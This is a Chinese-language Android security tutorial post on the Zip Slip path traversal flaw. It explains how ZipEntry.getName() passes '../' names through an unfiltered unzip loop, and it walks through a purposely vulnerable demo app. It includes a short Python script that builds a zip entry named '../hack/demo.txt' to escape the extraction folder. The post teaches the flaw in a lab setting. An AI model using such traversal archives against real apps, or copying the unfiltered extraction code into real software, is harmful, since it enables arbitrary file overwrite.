漏洞实战部分2-安卓应用ZipEntry对象问题实战
2022-12-18 15:26:0 Author: 安全狗的自我修养(查看原文) 阅读量:12 收藏

前期回顾

漏洞免费实战部分-安卓应用层getLastPathSegment函数问题

安卓应用漏洞学习

本节课介绍ZipEntry对象,这个对象常用于解压压缩包操作。

/ This class is used to represent a ZIP file entry.// Author:// David Connellypublicclass ZipEntry implements ZipConstants, Cloneable {    String name;        // entry name    long xdostime = -1; // last modification time (in extended DOS time,                        // where milliseconds lost in conversion might                        // be encoded into the upper half)    FileTime mtime;     // last modification time, from extra field data    FileTime atime;     // last access time, from extra field data    FileTime ctime;     // creation time, from extra field data    long crc = -1;      // crc-32 of entry data    long size = -1;     // uncompressed size of entry data    long csize = -1;    // compressed size of entry data    int method = -1;    // compression method    int flag = 0;       // general purpose flag    byte[] extra;       // optional extra field data for entry    String comment;     // optional comment string for entry    // Android-added: Add dataOffset for internal use.    // Used by android.util.jar.StrictJarFile from frameworks.    long dataOffset;

注释说明这个类对象是操作ZIP 文件的,App中Zip解压缩操作是最容易出差的地方。
常用的代码格式如下:

FileInputStream fileinputstream = new FileInputStream("/sdcard/case2.zip");  ZipInputStream zipInputStream = new ZipInputStream(fileinputstream);  ZipEntry zipEntry;  while ((zipEntry = zipInputStream.getNextEntry()) != null) {    ...

代码以流的形式读取文件再转为ZipEntry操作对象.其中zipEntry.getName()函数是获取压缩文件的文件名。当存在一个文件名包含../../../时,zipEntry.getName()也一并返回.如果后面没有过滤../那么继续执行就会目录穿越出去。

实战案例:
为了学习这个漏洞,我实现了一个App,通过这个App来理解利用。

功能:
App只有一个功能,接收zip包文件路径。

代码:
App启动时再私有目录下创建两个目录tmp、hack,正常的zip包传给App是无法解压到hack目录下。

创建一个带../的压缩包构造好穿越路径,使App解压包到hack目录下。

这里提供一个python脚本,用这个脚本可以生成包含../../的压缩文件。

import zipfile
if __name__ == "__main__": try: binary = 'hello hack' zipFile = zipfile.ZipFile("case2.zip","a",zipfile.ZIP_DEFLATED) zipfile.ZipInfo("case2.zip") zipFile.writestr("../hack/demo.txt",binary) zipFile.close()
except IOError as e: raise e

将生成的case2.zip push到手机设备或模拟器中的/sdcard/目录下。
启动case2.apk 输入 /sdcard/case2.zip 完成。

如果感兴趣可以了解下漏洞视频教程目录如下:

关注微信公众号或者可以直接加作者微信:

其它学习教程。


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwOTE5MDY5NA==&mid=2247487108&idx=1&sn=476b2ad381f867ed65dc9824a5af55d9&chksm=c13f3dcdf648b4db57376170952a3eeb86b6478c2102163b293bf660df2b4b92437703ab1581#rd
如有侵权请联系:admin#unsafe.sh